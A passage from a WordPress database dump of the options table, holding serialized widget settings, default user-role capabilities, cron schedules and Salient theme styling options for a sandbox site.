bla2\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:0:{}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','5','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wm_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:62:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:10:\"copy_posts\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:10:\"copy_posts\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:12:\"blog-sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:12:\"page-sidebar\";a:0:{}s:19:\"woocommerce-sidebar\";a:0:{}s:20:\"nectar-extra-sidebar\";a:0:{}s:13:\"footer-area-1\";a:1:{i:0;s:6:\"text-2\";}s:13:\"footer-area-2\";a:0:{}s:13:\"footer-area-3\";a:0:{}s:13:\"footer-area-4\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:5:{i:1541842916;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1541875499;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1541875506;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1541910199;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(110,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1512846141;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(125,'can_compress_scripts','0','no'),(140,'current_theme','Salient Child Theme','yes'),(141,'theme_mods_salient-child','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"top_nav\";i:28;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(142,'theme_switched','','yes'),(143,'widget_nectar_popular_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"375\";s:6:\"height\";s:3:\"400\";s:4:\"crop\";i:1;}','yes'),(145,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"630\";s:4:\"crop\";i:1;}','yes'),(146,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"130\";s:6:\"height\";s:3:\"130\";s:4:\"crop\";i:1;}','yes'),(147,'salient_redux','a:373:{s:8:\"last_tab\";s:1:\"1\";s:10:\"theme-skin\";s:6:\"ascend\";s:7:\"favicon\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:14:\"button-styling\";s:7:\"rounded\";s:16:\"theme-icon-style\";s:7:\"minimal\";s:16:\"overall-bg-color\";s:7:\"#f9f9f9\";s:18:\"overall-font-color\";s:7:\"#000000\";s:11:\"body-border\";s:1:\"0\";s:17:\"body-border-color\";s:7:\"#ffffff\";s:16:\"body-border-size\";s:0:\"\";s:11:\"back-to-top\";s:1:\"1\";s:18:\"back-to-top-mobile\";s:1:\"0\";s:16:\"smooth-scrolling\";s:1:\"0\";s:18:\"one-page-scrolling\";s:1:\"1\";s:10:\"responsive\";s:1:\"1\";s:14:\"ext_responsive\";s:1:\"1\";s:19:\"max_container_width\";s:4:\"1425\";s:15:\"lightbox_script\";s:8:\"magnific\";s:16:\"default-lightbox\";s:1:\"1\";s:23:\"column_animation_easing\";s:12:\"easeOutQuart\";s:23:\"column_animation_timing\";s:4:\"1000\";s:20:\"external-dynamic-css\";s:1:\"0\";s:16:\"google-analytics\";s:0:\"\";s:19:\"google-maps-api-key\";s:0:\"\";s:10:\"custom-css\";s:0:\"\";s:11:\"disable_tgm\";s:1:\"0\";s:22:\"disable_home_slider_pt\";s:1:\"0\";s:24:\"disable_nectar_slider_pt\";s:1:\"0\";s:12:\"accent-color\";s:7:\"#1e83ec\";s:13:\"extra-color-1\";s:7:\"#f1564f\";s:13:\"extra-color-2\";s:7:\"#50d18d\";s:13:\"extra-color-3\";s:7:\"#333333\";s:20:\"extra-color-gradient\";a:2:{s:4:\"from\";s:7:\"#3452ff\";s:2:\"to\";s:7:\"#ff1053\";}s:22:\"extra-color-gradient-2\";a:2:{s:4:\"from\";s:7:\"#2AC4EA\";s:2:\"to\";s:7:\"#32d6ff\";}s:12:\"boxed_layout\";s:1:\"0\";s:16:\"background-color\";s:7:\"#f1f1f1\";s:16:\"background_image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:17:\"background-repeat\";s:0:\"\";s:19:\"background-position\";s:0:\"\";s:21:\"background-attachment\";s:0:\"\";s:16:\"background-cover\";s:1:\"0\";s:19:\"extended-theme-font\";s:1:\"0\";s:22:\"navigation_font_family\";a:10:{s:11:\"font-family\";s:12:\"Varela Round\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"16px\";s:11:\"line-height\";s:4:\"16px\";s:14:\"letter-spacing\";s:0:\"\";}s:31:\"navigation_dropdown_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:24:\"page_heading_font_family\";a:10:{s:11:\"font-family\";s:4:\"Hind\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:10:\"capitalize\";s:9:\"font-size\";s:4:\"80px\";s:11:\"line-height\";s:4:\"80px\";s:14:\"letter-spacing\";s:4:\"-2px\";}s:33:\"page_heading_subtitle_font_family\";a:10:{s:11:\"font-family\";s:10:\"Montserrat\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:9:\"uppercase\";s:9:\"font-size\";s:4:\"16px\";s:11:\"line-height\";s:4:\"30px\";s:14:\"letter-spacing\";s:3:\"9px\";}s:26:\"off_canvas_nav_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"15px\";s:11:\"line-height\";s:4:\"24px\";s:14:\"letter-spacing\";s:0:\"\";}s:34:\"off_canvas_nav_subtext_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:16:\"body_font_family\";a:10:{s:11:\"font-family\";s:12:\"Varela Round\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"16px\";s:11:\"line-height\";s:4:\"31px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h1_font_family\";a:10:{s:11:\"font-family\";s:4:\"Hind\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"80px\";s:11:\"line-height\";s:4:\"80px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h2_font_family\";a:10:{s:11:\"font-family\";s:4:\"Hind\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"300\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"42px\";s:11:\"line-height\";s:4:\"48px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h3_font_family\";a:10:{s:11:\"font-family\";s:4:\"Hind\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"32px\";s:11:\"line-height\";s:4:\"32px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h4_font_family\";a:10:{s:11:\"font-family\";s:4:\"Hind\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"30px\";s:11:\"line-height\";s:4:\"40px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h5_font_family\";a:10:{s:11:\"font-family\";s:12:\"Varela Round\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:4:\"none\";s:9:\"font-size\";s:4:\"20px\";s:11:\"line-height\";s:4:\"32px\";s:14:\"letter-spacing\";s:0:\"\";}s:14:\"h6_font_family\";a:10:{s:11:\"font-family\";s:10:\"Montserrat\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:9:\"uppercase\";s:9:\"font-size\";s:4:\"12px\";s:11:\"line-height\";s:4:\"20px\";s:14:\"letter-spacing\";s:3:\"1px\";}s:13:\"i_font_family\";a:10:{s:11:\"font-family\";s:16:\"Playfair Display\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"15px\";s:11:\"line-height\";s:4:\"15px\";s:14:\"letter-spacing\";s:0:\"\";}s:17:\"label_font_family\";a:10:{s:11:\"font-family\";s:12:\"Varela Round\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:33:\"nectar_slider_heading_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:31:\"home_slider_caption_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:23:\"testimonial_font_family\";a:10:{s:11:\"font-family\";s:12:\"Varela Round\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"18px\";s:11:\"line-height\";s:4:\"33px\";s:14:\"letter-spacing\";s:0:\"\";}s:28:\"sidebar_footer_h_font_family\";a:10:{s:11:\"font-family\";s:10:\"Montserrat\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"700\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:5:\"latin\";s:14:\"text-transform\";s:9:\"uppercase\";s:9:\"font-size\";s:4:\"12px\";s:11:\"line-height\";s:4:\"12px\";s:14:\"letter-spacing\";s:3:\"1px\";}s:29:\"portfolio_filters_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:29:\"portfolio_caption_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:25:\"team_member_h_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:26:\"nectar_dropcap_font_family\";a:10:{s:11:\"font-family\";s:16:\"Playfair Display\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:3:\"400\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:4:\"64px\";s:11:\"line-height\";s:4:\"48px\";s:14:\"letter-spacing\";s:0:\"\";}s:41:\"nectar_sidebar_footer_headers_font_family\";a:10:{s:11:\"font-family\";s:0:\"\";s:12:\"font-options\";s:0:\"\";s:6:\"google\";s:1:\"1\";s:11:\"font-weight\";s:0:\"\";s:10:\"font-style\";s:0:\"\";s:7:\"subsets\";s:0:\"\";s:14:\"text-transform\";s:0:\"\";s:9:\"font-size\";s:0:\"\";s:11:\"line-height\";s:0:\"\";s:14:\"letter-spacing\";s:0:\"\";}s:33:\"use-responsive-heading-typography\";s:0:\"\";s:26:\"h1-small-desktop-font-size\";s:2:\"75\";s:19:\"h1-tablet-font-size\";s:2:\"70\";s:18:\"h1-phone-font-size\";s:2:\"65\";s:26:\"h2-small-desktop-font-size\";s:2:\"85\";s:19:\"h2-tablet-font-size\";s:2:\"80\";s:18:\"h2-phone-font-size\";s:2:\"70\";s:26:\"h3-small-desktop-font-size\";s:2:\"85\";s:19:\"h3-tablet-font-size\";s:2:\"80\";s:18:\"h3-phone-font-size\";s:2:\"70\";s:26:\"h4-small-desktop-font-size\";s:3:\"100\";s:19:\"h4-tablet-font-size\";s:2:\"90\";s:18:\"h4-phone-font-size\";s:2:\"90\";s:26:\"h5-small-desktop-font-size\";s:3:\"100\";s:19:\"h5-tablet-font-size\";s:3:\"100\";s:18:\"h5-phone-font-size\";s:3:\"100\";s:26:\"h6-small-desktop-font-size\";s:3:\"100\";s:19:\"h6-tablet-font-size\";s:3:\"100\";s:18:\"h6-phone-font-size\";s:3:\"100\";s:8:\"use-logo\";s:1:\"1\";s:4:\"logo\";a:5:{s:3:\"url\";s:84:\"https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/logo-dab.png\";s:2:\"id\";s:4:\"6661\";s:6:\"height\";s:2:\"54\";s:5:\"width\";s:3:\"215\";s:9:\"thumbnail\";s:91:\"https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/logo-dab-150x54.png\";}s:11:\"retina-logo\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:11:\"logo-height\";s:2:\"60\";s:18:\"mobile-logo-height\";s:2:\"40\";s:14:\"header-padding\";s:2:\"15\";s:19:\"header-remove-fixed\";s:1:\"0\";s:19:\"header-mobile-fixed\";s:1:\"1\";s:29:\"header-menu-mobile-breakpoint\";s:4:\"1000\";s:17:\"header-box-shadow\";s:5:\"small\";s:24:\"header-menu-item-spacing\";s:2:\"10\";s:17:\"header-bg-opacity\";s:2:\"96\";s:12:\"header-color\";s:6:\"custom\";s:23:\"header-background-color\";s:7:\"#ffffff\";s:17:\"header-font-color\";s:7:\"#888888\";s:23:\"header-font-hover-color\";s:7:\"#27CCC0\";s:32:\"header-dropdown-background-color\";s:7:\"#4066b3\";s:38:\"header-dropdown-background-hover-color\";s:7:\"#4066b3\";s:26:\"header-dropdown-font-color\";s:7:\"#ffffff\";s:32:\"header-dropdown-font-hover-color\";s:7:\"#ffffff\";s:34:\"header-dropdown-heading-font-color\";s:7:\"#ffffff\";s:40:\"header-dropdown-heading-font-hover-color\";s:7:\"#ffffff\";s:22:\"header-separator-color\";s:7:\"#eeeeee\";s:33:\"secondary-header-background-color\";s:7:\"#F8F8F8\";s:27:\"secondary-header-font-color\";s:7:\"#666666\";s:33:\"secondary-header-font-hover-color\";s:7:\"#222222\";s:45:\"header-slide-out-widget-area-background-color\";s:7:\"#4066b3\";s:47:\"header-slide-out-widget-area-background-color-2\";s:0:\"\";s:41:\"header-slide-out-widget-area-header-color\";s:7:\"#ffffff\";s:34:\"header-slide-out-widget-area-color\";s:7:\"#fff2f2\";s:40:\"header-slide-out-widget-area-hover-color\";s:7:\"#ffffff\";s:43:\"header-slide-out-widget-area-close-bg-color\";s:7:\"#ff1053\";s:45:\"header-slide-out-widget-area-close-icon-color\";s:7:\"#ffffff\";s:13:\"header_format\";s:7:\"default\";s:16:\"header-fullwidth\";s:1:\"0\";s:21:\"header-disable-search\";s:1:\"1\";s:26:\"header-disable-ajax-search\";s:1:\"0\";s:13:\"header_layout\";s:8:\"standard\";s:23:\"enable_social_in_header\";s:1:\"0\";s:24:\"use-facebook-icon-header\";s:0:\"\";s:23:\"use-twitter-icon-header\";s:0:\"\";s:27:\"use-google-plus-icon-header\";s:0:\"\";s:21:\"use-vimeo-icon-header\";s:0:\"\";s:24:\"use-dribbble-icon-header\";s:0:\"\";s:25:\"use-pinterest-icon-header\";s:0:\"\";s:23:\"use-youtube-icon-header\";s:0:\"\";s:22:\"use-tumblr-icon-header\";s:0:\"\";s:24:\"use-linkedin-icon-header\";s:0:\"\";s:19:\"use-rss-icon-header\";s:0:\"\";s:23:\"use-behance-icon-header\";s:0:\"\";s:25:\"use-instagram-icon-header\";s:0:\"\";s:22:\"use-flickr-icon-header\";s:0:\"\";s:23:\"use-spotify-icon-header\";s:0:\"\";s:22:\"use-github-icon-header\";s:0:\"\";s:29:\"use-stackexchange-icon-header\";s:0:\"\";s:26:\"use-soundcloud-icon-header\";s:0:\"\";s:18:\"use-vk-icon-header\";s:0:\"\";s:20:\"use-vine-icon-header\";s:0:\"\";s:21:\"use-houzz-icon-header\";s:1:\"0\";s:20:\"use-yelp-icon-header\";s:1:\"0\";s:21:\"use-email-icon-header\";s:1:\"0\";s:21:\"use-phone-icon-header\";s:1:\"0\";s:18:\"transparent-header\";s:1:\"1\";s:20:\"header-starting-logo\";a:5:{s:3:\"url\";s:84:\"https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/logo-dab.png\";s:2:\"id\";s:4:\"6661\";s:6:\"height\";s:2:\"54\";s:5:\"width\";s:3:\"215\";s:9:\"thumbnail\";s:91:\"https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/logo-dab-150x54.png\";}s:27:\"header-starting-retina-logo\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:25:\"header-starting-logo-dark\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:32:\"header-starting-retina-logo-dark\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:21:\"header-starting-color\";s:7:\"#686868\";s:29:\"header-transparent-dark-color\";s:7:\"#000000\";s:28:\"header-